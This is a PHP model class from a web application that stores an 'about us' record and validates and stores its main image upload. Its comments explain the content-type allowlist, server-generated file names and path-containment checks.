Viewing: About.php
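<?php

/**
 * Model for the single "about us" record (row id 1 of the about_us table)
 * and for the main image attached to it.
 *
 * Upload handling is security-relevant: the stored file name and extension are
 * always generated server-side, and old files are only removed when they
 * resolve to a path inside storage/uploads/about.
 */
class About extends BaseModel
{
    /**
     * Content types accepted for the main image, mapped to the extension that
     * is written to disk. The extension never comes from the client file name.
     */
    private const ALLOWED_MIME = [
        'image/jpeg' => 'jpg',
        'image/png' => 'png',
        'image/webp' => 'webp',
    ];

    /** Extensions rejected outright, before the content type is inspected. */
    private const BLOCKED_EXTENSIONS = ['php', 'js', 'html', 'svg', 'phtml', 'phar'];

    /** Upload directory, relative to ROOT_PATH. */
    private const UPLOAD_DIR = 'storage/uploads/about';

    protected string $table = 'about_us';

    // NOTE(review): presumably BaseModel::update() restricts writes to these
    // columns; confirm, since updateData() forwards caller-supplied keys.
    protected array $fillable = [
        'title_part1',
        'title_part2',
        'description_p1',
        'description_p2',
        'stat1_value',
        'stat1_title',
        'stat2_value',
        'stat2_title',
        'stat3_value',
        'stat3_title',
        'main_image',
        'status',
        'updated_at',
    ];

    /**
     * Fetch the about_us row with id 1.
     *
     * @return array The row, or an empty array when fetch() yields nothing.
     */
    public function getData(): array
    {
        // Static query text: no caller input is interpolated here.
        $statement = $this->db->query('SELECT * FROM about_us WHERE id = 1 LIMIT 1');

        return $statement->fetch() ?: [];
    }

    /**
     * Update row 1 with the given values, stamping updated_at with the current time.
     *
     * @param array $data Column => value pairs, passed on to BaseModel::update().
     */
    public function updateData(array $data): bool
    {
        $data['updated_at'] = date('Y-m-d H:i:s');

        return $this->update(1, $data);
    }

    /**
     * Store an uploaded main image and remove the previous one.
     *
     * @param array       $file    One entry of $_FILES (name, tmp_name, error).
     * @param string|null $oldFile Relative path of the image being replaced, if any.
     *
     * @return string|null Relative path of the stored file, or null when nothing
     *                     was uploaded, the type is not allowed, or storing failed.
     */
    public function uploadMainImage(array $file, ?string $oldFile = null): ?string
    {
        if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return null;
        }

        // The type is taken from the file content, not from the client-supplied
        // name or Content-Type. mime_content_type() returns false on failure.
        $mime = mime_content_type($file['tmp_name']);
        if (!is_string($mime) || !array_key_exists($mime, self::ALLOWED_MIME)) {
            return null;
        }

        // Server-generated name with a random component: the client cannot pick
        // the extension or overwrite an existing file by guessing its name.
        $filename = 'about_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . self::ALLOWED_MIME[$mime];
        $directory = ROOT_PATH . '/' . self::UPLOAD_DIR;
        $destination = $directory . '/' . $filename;

        // Re-check is_dir() after a failed mkdir() so a concurrent request that
        // created the directory first is not treated as an error.
        // NOTE(review): 0775 is group-writable; confirm that suits the host, and
        // that the web server does not execute scripts from this directory.
        if (!is_dir($directory) && !mkdir($directory, 0775, true) && !is_dir($directory)) {
            return null;
        }

        // move_uploaded_file() refuses paths that are not genuine HTTP uploads.
        if (!move_uploaded_file($file['tmp_name'], $destination)) {
            return null;
        }

        $this->deleteOldFile($oldFile);

        return self::UPLOAD_DIR . '/' . $filename;
    }

    /**
     * Check an optional image upload.
     *
     * @param array $file One entry of $_FILES (name, tmp_name, error).
     *
     * @return bool True when no file was submitted or the file is an allowed
     *              image type; false on an upload error or a disallowed file.
     */
    public function validImage(array $file): bool
    {
        // No file submitted: the image is optional, so this counts as valid.
        if (empty($file['name'])) {
            return true;
        }

        if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return false;
        }

        // The extension blocklist is only an early reject; a blocklist is never
        // complete. The content-type allowlist below is the deciding check.
        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
        if (in_array($extension, self::BLOCKED_EXTENSIONS, true)) {
            return false;
        }

        $mime = mime_content_type($file['tmp_name']);

        return is_string($mime) && array_key_exists($mime, self::ALLOWED_MIME);
    }

    /**
     * Delete a previously stored image, but only if it resolves to a regular
     * file inside the upload directory.
     *
     * @param string|null $oldFile Path relative to ROOT_PATH, as stored for the record.
     */
    private function deleteOldFile(?string $oldFile): void
    {
        if (!$oldFile) {
            return;
        }

        // realpath() resolves "..", symlinks and duplicate slashes, so the
        // containment test below runs on canonical paths.
        $base = realpath(ROOT_PATH . '/' . self::UPLOAD_DIR);
        $target = realpath(ROOT_PATH . '/' . ltrim($oldFile, '/'));

        if ($base === false || $target === false) {
            return;
        }

        // Compare against the directory plus a trailing separator. A bare prefix
        // match would also accept sibling paths such as ".../about_old/x.jpg",
        // letting a stored path delete files outside the upload directory.
        if (str_starts_with($target, $base . DIRECTORY_SEPARATOR) && is_file($target)) {
            unlink($target);
        }
    }
}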